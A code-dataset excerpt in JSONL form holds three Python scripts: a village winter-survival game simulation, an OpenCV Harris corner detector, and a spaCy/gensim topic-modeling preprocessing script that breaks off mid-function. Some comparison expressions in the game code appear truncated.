"line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 211, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 213, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 221, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.shutdown", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "6594041699", "text": "import random\nimport math\n\nclass Charac(object):\n def __init__(self,like,respect,attract,name,img,ide,characters):\n self.like = like\n self.resp = respect\n self.att = attract\n self.name = name\n self.ide = ide\n self.scene = 1\n characters.append(self)\n print(characters)\n\n def __str__(self):\n print(self.ide)\n\n def statchange(self,stat,change):\n self.__dict__[stat] += change\n print(self.name + \"'s \" + str(stat) + \" stat changed by \" + str(change))\n\n def relchange(self,other,change):\n self.__dict__[other.ide] += change\n other.__dict__[self.ide] += change\n print(self.name + \" and \" + str(other.name) + \"'s relationship changed by \" + str(change))\n\n def establishrels(self,characters):\n for i in range(len(characters)):\n if characters[i].ide != self.ide:\n setattr(self, characters[i].ide, 0)\n\n\n\nclass Peasant(object):\n def __init__(self, name,peasants,children,elders,workers):\n def getRandomAge():\n age = -1\n mu = 40\n sigma = 35\n while age < 1 or age > 80:\n age = int(round(random.gauss(mu, sigma)))\n return age\n self.name = name\n self.age = getRandomAge()\n self.warmth = 100\n self.maxwarmth = 100\n self.hunger = 100\n self.maxhunger = 100\n if self.age > 20:\n self.maxhealth = 120-self.age\n else:\n self.maxhealth = 100\n\n self.currenthealth = (3*self.maxhealth/4)\n\n self.passionHunting = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionFishing = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionForaging = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionGathering = random.randint(random.randint(1,4),random.randint(6,10))\n\n choice = random.randint(1,4)\n if choice == 1:\n self.passionHunting = random.randint(1,10)\n elif choice == 2:\n self.passionFishing = random.randint(1,10)\n elif choice == 3:\n self.passionForaging = random.randint(1,10)\n else:\n self.passionGathering = random.randint(1,10)\n\n self.occupation = \"General Worker\"\n self.status = \"Alive and Well\"\n self.hasPelt = 0\n self.hasFire = 0\n if self.age > 60:\n self.occupation = \"Elder\"\n elders.append(self)\n elif self.age < 20:\n self.occupation = \"Child\"\n children.append(self)\n else:\n workers.append(self)\n peasants.append(self)\n \n\nclass Game(object):\n def __init__(self):\n self.characters = []\n self.crier = Charac(0,0,0,'Nat',\"image!!!\",\"crier\",self.characters)\n self.butcher = Charac(0,0,0,'Mik',\"image!!!\",\"butcher\",self.characters)\n self.herbalist = Charac(0,0,0,'Joan',\"image!!!\",\"herbalist\",self.characters)\n self.widow = Charac(0,0,0,'Elena',\"image!!!\",\"widow\",self.characters)\n self.landowner = Charac(0,0,0,'Elisabetta',\"image!!!\",\"landowner\",self.characters)\n self.innkeeper = Charac(0,0,0,'Henryk',\"image!!!\",\"innkeeper\",self.characters)\n self.doctor = Charac(0,0,0,'Fyodora',\"image!!!\",\"doctor\",self.characters)\n self.alderman = Charac(0,0,0,'Alexi',\"image!!!\",\"alderman\",self.characters)\n self.initrels(self.characters)\n\n self.peasants = []\n self.workers = []\n self.elders = []\n self.children = []\n\n self.actions = 5\n self.playerFuel, self.playerHerb, self.playerhuntedFood, self.playerPelts, self.playerfishedFood = 0,0,0,0,0\n self.eventstag = False # initialise all events and scenes as booleans and ranges within arrays respectively\n self.eventstagnight = False\n\n for i in range(100):\n Peasant('Tudor ' + str(i),self.peasants,self.children,self.elders,self.workers)\n\n \n self.workersnum = 10\n self.workersorder = 0\n self.initialiseWorkers()\n\n \n \n self.popHealthy = 100\n self.popIll = 0\n self.popDead = 0\n self.popRecovering = 0\n self.popBuried = 0\n\n self.newRecovered = 0\n self.newIll = 0\n self.newDead = 0\n\n\n self.popMorale = 50\n self.popCohesion = 30\n\n self.debugmod = 100\n # starting values for resources\n self.worldherbs = 2000*self.debugmod\n self.herbs = 0\n self.medicine = 0\n self.alcohol = 0\n self.worldfuel = 9000*self.debugmod\n self.fuel = 200\n self.worldpelts = 180*self.debugmod\n self.pelts = 0\n self.food = 250\n self.worldfood = 4000*self.debugmod\n \n self.fueleffect = 20\n self.foodeffect = 20\n\n self.foodchoice = 2\n self.fuelchoice = 2\n self.herbchoice = 3\n self.peltchoice = 2\n\n self.day = 0\n self.rollevent = random.randint(1,4)\n self.adjectivePrecip = ['dry','raining','snowing']\n self.adjectiveWind = ['calm','windy','blowing a gale']\n self.adjectiveCold = ['mild','chilly','brisk','freezing','deathly']\n\n def initialiseWorkers(self):\n def topWorker(professionlist, occTag, passion):\n tagged = 0\n count = 0\n #print(passion)\n high = sorted(self.workers, key=lambda x: x.__dict__[passion], reverse=True)\n while tagged == 0:\n #print(count)\n #print(high[count].occupation)\n if high[count].occupation == 'General Worker':\n high[count].occupation = occTag\n professionlist.append(high[count])\n tagged = 1\n else:\n if count 0:\n heat = (math.log(peasant.hasFire,2)+2)*self.fueleffect\n print(heat)\n if peasant.hasPelt > 0:\n heat += (self.fueleffect)\n warmthchange = (heat-self.cold)\n print(\"heat :\" +str(heat))\n print(\"coldness of weather : \" + str(self.cold))\n print(\"warmth change : \" + str(warmthchange))\n\n print(\"old warmth : \" + str(peasant.warmth))\n peasant.warmth = self.addsubLim(peasant.warmth,warmthchange,peasant.maxwarmth) \n\n print(\"new warmth : \" + str(peasant.warmth))\n a = self.subLim(peasant.currenthealth,(peasant.maxwarmth-peasant.warmth)/5,0)\n peasant.currenthealth = a\n print(\"current health : \" + str(peasant.currenthealth))\n\n\n def hungercheck(self):\n for peasant in self.peasants:\n hunger = 0\n if peasant.hasFood > 0:\n hunger = (math.log(peasant.hasFood,2)+2)*self.foodeffect\n \n hungerchange = (hunger-self.cold)\n peasant.hunger = self.addsubLim(peasant.hunger,hungerchange,peasant.maxhunger)\n print(\"fedness : \"+ str(peasant.hunger))\n print(\"current health : \" + str(peasant.currenthealth))\n a = self.addsubLim(peasant.currenthealth,(peasant.hunger-50)/10,peasant.maxhealth)\n peasant.currenthealth = a\n print(\"new health : \" + str(peasant.currenthealth))\n print(\" Name : {name} - Occupation : {occ} - Health : {health}/{maxhealth}\".format(name=peasant.name,occ=peasant.occupation,health=peasant.currenthealth,maxhealth=peasant.maxhealth))\n \n\n def advanceNight(self):\n self.bigFeast()\n self.bigBurn()\n\n self.distributePelts()\n\n self.giveMedicine()\n\n self.recovered()\n self.sickDie()\n self.newSick()\n\n self.warmcheck()\n self.hungercheck()\n\n # morning here\n self.morale_sick_dead()\n self.checkPop()\n\n self.day += 1\n self.startDayMessage()\n if self.day<30:\n self.playerFuel, self.playerHerb, self.playerPelts, self.playerhuntedFood, self.playerfishedFood = 0,0,0,0,0\n self.actions = 5\n self.rollevent = random.randint(1,4)\n self.weatherMake()\n self.newWorkers()\n self.worldDecay()\n return\n\n def startDayMessage(self):\n print(\"\")\n print(\"Day \" + str(self.day) + \" has begun\")\n\n def endDayMessage(self):\n print(\"\")\n print(\"Day \" + str(self.day) + \" has ended\")\n print(\"End of day report:\")\n\n def addLim(self, a, b, limit):\n c = a+b\n print(a)\n print(b)\n print(c)\n if c>limit:\n return limit\n else:\n return c\n\n def subLim(self, a, b, limit):\n d = a-b\n if d=0:\n return self.addLim(a,b,uplim)\n else:\n return self.subLim(a, -b, downlim)\n\n def genworkersMiniEvent(self): # if too few townspeople for nonworkers and resource management, lose cohesion, morale or resources / else vice versa\n pass\n\n def morale_yields_main(self): # gain if good yields, loss if casualties\n pass\n\n def bigFeast(self):\n def eatFood(peasant):\n peasant.hasFood = 0\n if self.distfood > 0:\n self.distfood -= self.foodpp\n peasant.hasFood = (self.foodpp)\n if peasant.hasFood >= 2:\n self.popCohesion = self.addLim(self.popCohesion,0.1,100)\n elif peasant.hasFood < 1 and peasant.hasFood > 0:\n self.popMorale = self.subLim(self.popMorale,0.1,0)\n else:\n self.popMorale = self.subLim(self.popMorale,1,0)\n self.popCohesion = self.subLim(self.popCohesion,1,0)\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n eatFood(peasant)\n \n\n def bigBurn(self):\n def burnLog(peasant):\n peasant.hasFire = 0\n if self.distfuel > 0:\n self.distfuel -= self.fuelpp\n peasant.hasFire = (self.fuelpp)\n if peasant.hasFire >= 2:\n self.popMorale = self.addLim(self.popMorale,0.1,100)\n elif peasant.hasFire < 1 and peasant.hasFire > 0:\n self.popCohesion = self.subLim(self.popCohesion,0.1,0)\n else:\n self.popMorale = self.subLim(self.popMorale,1,0)\n self.popCohesion = self.subLim(self.popCohesion,1,0)\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n burnLog(peasant)\n\n def giveMedicine(self):\n def takeMeds(peasant):\n if self.medicine > 0:\n self.medicine -= 1\n peasant.hasMeds = 1\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n peasant.hasMeds = 0\n if peasant.status == \"Sick\":\n takeMeds(peasant)\n\n def morale_sick_dead(self): \n pass\n\n def distributePelts(self):\n self.used_pelts = 0\n def peltTime(peasant):\n peasant.hasPelt = 0\n if self.used_pelts < self.pelts:\n peasant.hasPelt = 1\n self.used_pelts += 1\n for peasant in self.peasants:\n peltTime(peasant)\n\n def checkPop(self):\n self.popIll = 0\n self.popHealthy = 0\n self.popDead = 0\n self.popRecovering = 0\n self.popBuried = 0\n for peasant in self.peasants:\n if peasant.status == \"Alive and Well\":\n self.popHealthy += 1\n elif peasant.status == \"Sick\":\n self.popIll += 1\n elif peasant.status == \"Recovering from Sickness\":\n self.popHealthy += 1\n elif peasant.status == \"Dead\":\n self.popDead += 1\n else:\n self.popBuried += 1\n\n \n def workersBack(self): # make more probabilistic and proportional to value of resources\n def skillRoll(worker,skill,m_yield):\n rnd = random.randint(1,10)\n if rnd < worker.__dict__[skill]:\n return m_yield\n else:\n #worker.currenthealth = self.subLim(worker.currenthealth, rnd, 0)\n return m_yield/2\n\n def fromWorld(percentage,resource):\n takeaway = round((percentage/1000.0)*self.__dict__['world'+str(resource)]*(2**((self.popMorale/50)-1)))\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n def fromWorldAbs(absol,resource):\n takeaway = absol\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n gatheredsucc = 0\n gatheredFuel = 0\n foragedsucc = 0\n foragedHerb = 0\n huntedsucc = 0\n huntedPelts = 0\n huntedFood = 0\n fishedsucc = 0\n fishedFood = 0\n for i in range(len(self.gatherers)): # all workers roll for success, and can either fail or choose to half succeed with a consequence\n \n gatheredsucc += skillRoll(self.gatherers[i],'passionGathering',1)\n self.gatherers[i].currenthealth = self.subLim(self.gatherers[i].currenthealth,random.randint(1,8),0) \n for i in range(len(self.foragers)):\n foragedsucc += skillRoll(self.foragers[i],'passionForaging',1)\n self.foragers[i].currenthealth = self.subLim(self.foragers[i].currenthealth, random.randint(1,8),0)\n for i in range(len(self.hunters)):\n huntedsucc += skillRoll(self.hunters[i],'passionHunting',1)\n self.hunters[i].currenthealth = self.subLim(self.hunters[i].currenthealth, random.randint(1,8),0)\n for i in range(len(self.fishermen)):\n fishedsucc += skillRoll(self.fishermen[i],'passionFishing',1)\n self.fishermen[i].currenthealth = self.subLim(self.fishermen[i].currenthealth, random.randint(1,8),0)\n\n gatheredFuel = fromWorld(gatheredsucc,'fuel')\n foragedHerb = fromWorld(foragedsucc,'herbs')\n huntedFood = fromWorld(huntedsucc,'food')\n ## change this VV\n huntedpeltssucc = 0\n for i in range(int(huntedFood)):\n if random.randint(1,100) >= 99:\n huntedpeltssucc+=1\n huntedPelts = fromWorldAbs(huntedpeltssucc,'pelts')\n fishedFood = fromWorld(fishedsucc,'food')\n return gatheredFuel, foragedHerb, huntedFood, huntedPelts, fishedFood\n\n def playerHarvest(self,harvesttype,actioncost):\n def fromWorld(percentage,resource):\n takeaway = round(((actioncost*1.5)-0.5)*(percentage/1000.0)*self.__dict__['world'+str(resource)])\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n def fromWorldAbs(absol,resource):\n takeaway = absol\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n self.playersuccess = 10\n if harvesttype == \"hunt\" or harvesttype == \"fish\":\n restype = \"food\"\n elif harvesttype == \"gather\":\n restype = \"fuel\"\n else:\n restype = \"herbs\"\n\n harvested = fromWorld(self.playersuccess,restype)\n if harvesttype == \"gather\":\n self.playerFuel += harvested\n elif harvesttype == \"forage\":\n self.playerHerb += harvested\n elif harvesttype == \"fish\":\n self.playerfishedFood += harvested\n else:\n huntedpeltssucc = 0\n for i in range(int(harvested)):\n if random.randint(1,100) >= 99:\n huntedpeltssucc+=1\n self.playerPelts += fromWorldAbs(huntedpeltssucc,'pelts')\n self.playerhuntedFood += harvested\n self.actions -= (actioncost)\n\n def updateRes(self, gatheredFuel, foragedHerb, huntedFood, huntedPelts, fishedFood):\n self.food += fishedFood\n self.fuel += gatheredFuel\n self.herbs += foragedHerb\n self.food += huntedFood\n self.pelts += huntedPelts\n return\n\n\n def genworkerRandomChange(self):\n for i in range(len(self.genworkers)):\n self.genworkers[i].currenthealth = self.addsubLim(self.genworkers[i].currenthealth,random.randint(-2,2),self.genworkers[i].maxhealth)\n \n\n def recovered(self):\n for i in range(len(self.peasants)):\n if self.peasants[i].status == 'Recovering from Sickness':\n self.peasants[i].status = 'Alive and Well'\n \n def sickDie(self):\n \n self.newRecovered = 0\n self.newDead = 0\n def tryTakeMeds(sicko):\n if sicko.hasMeds > 0:\n print(sicko.name + \" is recovering from sickness after being treated\")\n sicko.status = 'Recovering from Sickness'\n self.newRecovered += 1\n else:\n if random.randint(1,100) > (sicko.currenthealth+sicko.warmth)/2:\n print(sicko.name + \" has died.\")\n sicko.status = 'Dead'\n self.newDead += 1\n else:\n sicko.currenthealth = self.addLim(sicko.currenthealth, round(0.1*sicko.currenthealth),sicko.maxhealth)\n print(sicko.name + \" is recovering from sickness despite the lack of medicine\")\n sicko.status = 'Recovering from Sickness'\n self.newRecovered += 1\n\n for i in range(len(self.peasants)):\n if self.peasants[i].currenthealth <= 0 and self.peasants[i].status != 'Dead':\n self.peasants[i].status = 'Dead'\n self.newDead += 1\n if self.peasants[i].status == 'Dead':\n self.peasants[i].currenthealth = 0\n if self.peasants[i].status == 'Sick':\n tryTakeMeds(self.peasants[i])\n\n\n\n \n def newSick(self):\n self.newIll = 0\n for i in range(len(self.peasants)):\n if self.peasants[i].status == 'Alive and Well' and (self.peasants[i].currenthealth+self.peasants[i].warmth)/2 < 40:\n if random.randint(1,100) > self.peasants[i].currenthealth:\n print(self.peasants[i].name + \" (\" + self.peasants[i].occupation + \") has taken ill\")\n self.peasants[i].status = 'Sick'\n self.newIll += 1\n else:\n self.peasants[i].currenthealth = self.addLim(self.peasants[i].currenthealth, round(0.1*self.peasants[i].currenthealth),self.peasants[i].maxhealth)\n \n\n\n\n \n \"\"\"\n def communityChange(self):\n self.newill = self.newIll()\n self.newdead, self.newrecovered = self.newDead()\n self.pophealthy += self.newrecovered - self.newill\n self.popill += self.newill - self.newdead - self.newrecovered\n self.popdead += self.newdead\n\n def newIll(self):\n return self.weatherCold*3 # placeholder !!\n\n def newDead(self):\n dead = 0\n recover = 0\n for i in range(self.popill):\n if self.herbs > 0:\n self.herbs -= 1\n recover += 1\n else:\n dead += 1\n\n\n return dead, recover\n \"\"\"\n \n\n def weatherMake(self):\n # weather / \n yeet = random.randint(1,40)\n yote = random.randint(1,40)\n \"\"\"\n self.weatherPrecip=0 # dry\n self.weatherWind=0 # calm\n self.weatherCold=0 # mild\n \"\"\"\n\n self.precip = yeet+self.day # ranges from 0-70 day 0, to 30-100 day 30\n \"\"\"\n if precip > 60:\n self.weatherPrecip = 2 # snow\n elif precip > 30:\n self.weatherPrecip = 1 # rain\n \"\"\"\n self.wind = yote+self.day # ranges from 0-70 day 0, to 30-100 day 30\n\n \"\"\"\n if wind > 60:\n self.weatherWind = 2 # gale\n elif wind > 30:\n self.weatherWind = 1 # breezy\n \"\"\"\n\n self.cold = (self.precip + self.wind)*0.75# ranges from 0-70 day 0, to 30-100 day 30 // now 0-105 tending to 52\n\n \"\"\"\n if cold > 80:\n self.weatherCold = 4 # deathly\n elif cold > 60:\n self.weatherCold = 3 # freezing\n elif cold > 40:\n self.weatherCold = 2 # brisk\n elif cold > 20:\n self.weatherCold = 1 # chilly\n \"\"\"\n \n \n \n return\n \n\n\n \n \ndef main():\n\n \n\n \"\"\"\n print(game.crier.widow)\n print(game.crier.like)\n game.crier.statchange(\"like\",1)\n print(game.crier.like)\n print(game.crier.widow)\n game.crier.relchange(game.widow,9)\n print(game.crier.widow)\n print(game.widow.crier)\n\n print(game.__dict__)\n print(game.foodstuffs())\n game.reschange(\"fish\",-22)\n print(game.foodstuffs())\n\n print(game.crier.name)\n\n print(game.day)\n game.advanceDay(game)\n\n print(game.day)\n print(game.adjectiveWind[game.weatherWind])\n print(game.adjectivePrecip[game.weatherPrecip])\n print(game.adjectiveCold[game.weatherCold])\n\n\n print(game.characters)\n for i in range(len(game.peasants)):\n print(game.peasants[i].__dict__)\n\n print(len(game.workers))\n print(len(game.children))\n print(len(game.elders))\n\n \"\"\"\n\n def display(x,occ=False):\n if occ == True:\n print(\" __ __ __ \" + str((x[0].occupation)) + \" __ __ __\")\n else:\n print(\" __ __ __ Workers __ __ __\")\n for i in range(len(x)):\n print(x[i].__dict__)\n \"\"\"\n display(game.hunters,True)\n display(game.foragers,True)\n display(game.gatherers,True)\n display(game.fishermen,True)\n display(game.genworkers,True)\n\n display(sorted(game.workers, key=lambda x: x.occupation, reverse=True))\n\n \"\"\"\n class statistics:\n def __init__(self,game):\n self.currenthealths = []\n self.currenthealths.append([peasant.currenthealth for peasant in game.peasants])\n self.avghealth = []\n self.avghealth.append(sum(self.currenthealths[0])/len(self.currenthealths[0]))\n self.popalive = []\n self.popalive.append(100-game.popDead)\n\n def update(self,i):\n self.currenthealths.append([peasant.currenthealth for peasant in game.peasants])\n self.avghealth.append(sum(self.currenthealths[i+1])/len(self.currenthealths[i+1]))\n self.popalive.append(100-game.popDead)\n\n \n\n def daynightcycle(number):\n choices = [\"hunt\", \"fish\", \"forage\", \"gather\"]\n game.weatherMake()\n game.playerHarvest(choices[random.randint(1,4)-1],number)\n game.advanceDay()\n game.updateFood()\n game.updateFuel()\n game.updateHerb()\n game.advanceNight()\n\n import matplotlib.pyplot as plt\n \n def openplot(ax,x,y,ylabel):\n ax.plot(x, y)\n\n ax.set(xlabel='time (days)', ylabel=ylabel,\n title='')\n ax.grid()\n time = range(30)\n stats = {}\n ax1 = plt.subplot(211)\n\n ax2 = plt.subplot(212, sharex=ax1)\n\n for j in range(100):\n game = Game()\n stats[j] = statistics(game)\n for i in range(29):\n daynightcycle(5)\n stats[j].update(i)\n openplot(ax1,time,stats[j].avghealth,ylabel='Average health of VILLAGE')\n openplot(ax2,time,stats[j].popalive,ylabel='surviving pop of VILLAGE')\n\n plt.show()\n \n \n print([stat.avghealth for stat in stats.values()])\n\n \n#main()", "repo_name": "jebblewhite/sun_sun_nosun", "sub_path": "game/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 27981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.gauss", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 61, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 63, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 67, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 155, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 186, "usage_type": "call"}, {"api_name": "math.log", "line_number": 293, "usage_type": "call"}, {"api_name": "math.log", "line_number": 315, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 409, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 428, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 438, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 478, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 507, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 510, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 513, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 516, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 524, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 559, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 576, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 594, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 620, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 659, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 660, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 780, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 797, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 797, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 799, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 799, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}]} +{"seq_id": "41762676547", "text": "# python version\n\nimport cv2 \nimport numpy as np\nimport time\n\nimg_color = cv2.imread('chessboard.jpg', cv2.IMREAD_COLOR)\nimg_gray = cv2.imread('chessboard.jpg', cv2.COLOR_BGR2GRAY)\n\nimg_sobel_x = cv2.Sobel(img_gray, cv2.CV_32F,1,0)\nimg_sobel_y = cv2.Sobel(img_gray, cv2.CV_32F,0,1)\n\nlxlx = img_sobel_x * img_sobel_x\nlyly = img_sobel_y * img_sobel_y\nlxly = img_sobel_x * img_sobel_y\n\nh, w = img_color.shape[:2]\n\nwindow_size = 5\noffset = int(window_size/2)\n\nr = np.zeros(img_gray.shape)\n\nstart = time.perf_counter()\nfor y in range(offset, h - offset):\n for x in range(offset, w - offset):\n window_lxlx = lxlx[y-offset: y+offset +1 , x-offset : x+offset + 1]\n window_lyly = lyly[y-offset: y+offset +1 , x-offset : x+offset + 1]\n window_lxly = lxly[y-offset: y+offset +1 , x-offset : x+offset + 1]\n \n\n Mxx = window_lxlx.sum()\n Myy = window_lyly.sum()\n Mxy = window_lxly.sum()\n\n \n det = Mxx * Myy - Mxy*Mxy\n trace = Mxx + Myy\n\n r[y,x] = det - 0.04*(trace **2)\n print(r[y,x])\n\n \ncv2.normalize(r, r, 0.0 , 1.0 , cv2.NORM_MINMAX)\n\nfor y in range(offset, h -offset):\n for x in range(offset, w -offset):\n \n if r[y, x][0] > 0.4:\n img_color.itemset((y,x,0), 0)\n img_color.itemset((y,x,1), 0)\n img_color.itemset((y,x,2), 255)\n\nend = time.perf_counter()\nprint(end - start)\n\ncv2.imshow('original', img_color)\ncv2.waitKey()\ncv2.destroyAllWindows()", "repo_name": "FLY-CODE77/opencv", "sub_path": "project/MAV_DIS/Harris_corner.py", "file_name": "Harris_corner.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.CV_32F", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.CV_32F", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 44, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "17376400910", "text": "import numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim import corpora\nfrom gensim.models import Phrases, CoherenceModel, LdaModel\nfrom gensim.models.phrases import Phraser\nfrom gensim.models.wrappers import LdaMallet\n\nfrom matplotlib import pyplot as plt\n\nmallet_path = r'/Users/annalisa/PycharmProjects/TopicModeling/newsgroup/mallet-2.0.8/bin/mallet'\n\nnlp = spacy.load('en_core_web_lg', disable=['parser', 'ner'])\nspacy.load('en_vectors_web_lg', vocab=nlp.vocab)\nnlp.max_length = 1500000\n\nstopwords = nlp.Defaults.stop_words | {'re', 'rt', 'co', 'amp'}\n\nwords_to_exclude = ['glasgow', 'newcastle', 'durham', 'wrexham', 'swansea', 'bristol', 'hull', 'walthamstow', 'york',\n 'plymouth',\n 'battersea', 'cambridge', 'middlesbrough', 'wolverhampton', 'leeds', 'sunderland', 'portsmouth',\n 'croydon',\n 'cardiff', 'peterborough', 'oxford', 'edinburgh', 'greater_manchester', 'newport', \"cardiff\",\n \"salford\",\n 'brighton', 'nottingham', 'slough', 'hartlepool', 'lancashire', 'ealing', 'stoke_trent', 'oldham',\n 'blackpool', 'north_east', 'west_midlands', 'lincoln', 'bardford', 'barnsley', 'leichester',\n 'hull_north',\n 'bolton', 'harrow', 'newport_west', 'stoke', 'welsh', 'scottish', 'sheffield', 'chorley',\n 'grimsby',\n 'ipswich', 'colchester', 'northampton', 'swindon', 'worchester', 'southampton', 'northumberland',\n 'kent',\n 'essex', 'plymouth', 'west_midlands', 'dover', 'watford', 'cornwall', 'wimbledon', 'plymouth',\n 'gloucester',\n 'norwich', 'telford', 'redditch', 'norfolk', 'ashford', 'crawley', 'southend', 'worcester',\n 'stevenage',\n 'shrewsbury', 'fulham', 'shropshire', 'chelsea', 'suffolk', 'salisbury', 'dorset', 'chelmsford',\n 'devon',\n 'worcestershire', 'south_west', 'yorkshire', 'derbyshire', 'bournemouth', 'manchester', 'morley',\n 'medway',\n 'lewisham', 'preston', 'stockton', 'newham', 'chesterfield',\n 'bradford', 'huddersfield', 'lancaster', 'morecambe', 'humpshire', 'sussex', 'stafford',\n 'liverpool', 'ogmore',\n 'cheltenham', 'birmingham', 'surrey', 'bath', 'sutton', 'brecon', 'hampshire', 'dewsbury',\n 'leicester', 'rotherham', 'stroud', 'gower', 'wigan', 'wakefield', 'bridgend', 'llanelli', 'bury', 'canterbury']\n\n\ndef lemmatization(list_of_docs): # returns lemma only of nouns, adj, verbs and adv\n keep_tags = ['NOUN', 'ADJ', 'VERB', 'ADV', 'PROPN']\n lemmatized_text = []\n for sent in list_of_docs:\n # doc = nlp(\" \".join(sent)) # we need to pass a string of words, not a list\n doc = nlp(sent) # we need to pass a string of words, not a list\n lemmatized_text.append(\n [token.lemma_.lower() for token in doc if\n token.pos_ in keep_tags and token.is_alpha and len(\n token.lemma_) > 1 and token.lemma_.strip().lower() not in stopwords])\n # is_apha removes number, punctuation and urls\n print(f\"{len(lemmatized_text)} sentences lemmatized\")\n # print(lemmatized_text[0])\n return lemmatized_text\n\n\n# takes a list of lemmatized words\ndef make_bigrams(text):\n bigram_model = Phraser(Phrases(text, min_count=5, threshold=100))\n return [bigram_model[doc] for doc in text]\n\n\n# creates a list of coherence scores (umass and cv) for mallet models\n\ndef coh_mallet(max_topic, corpus, id2word, docs_bigrams):\n umass_mallet = []\n cv_mallet = []\n for nb_topics in range(1, max_topic + 1):\n lda = LdaMallet(mallet_path, corpus=corpus, id2word=id2word, num_topics=nb_topics, random_seed=1)\n cohm = CoherenceModel(model=lda, corpus=corpus, dictionary=id2word, coherence='u_mass').get_coherence()\n coh_cv = CoherenceModel(model=lda, texts=docs_bigrams, dictionary=id2word, coherence='c_v').get_coherence()\n umass_mallet.append(cohm)\n cv_mallet.append(coh_cv)\n print(nb_topics, \" u_mass : \", cohm, \" - c_v : \", coh_cv)\n return umass_mallet, cv_mallet\n\n\n# creates a plot with coherence values\ndef plot_coh_scores(x, y, ylabel):\n plt.figure(figsize=(10, 5))\n plt.plot(x, y)\n plt.xlabel(\"Number of Topics\")\n plt.ylabel(ylabel)\n plt.show()\n\n\n# convert the mallet model to a regular LDA gensim model, in order to perform the visualization\ndef convertldaMalletToldaGen(mallet_model):\n model_gensim = LdaModel(\n id2word=mallet_model.id2word, num_topics=mallet_model.num_topics,\n alpha=mallet_model.alpha)\n model_gensim.state.sstats[...] = 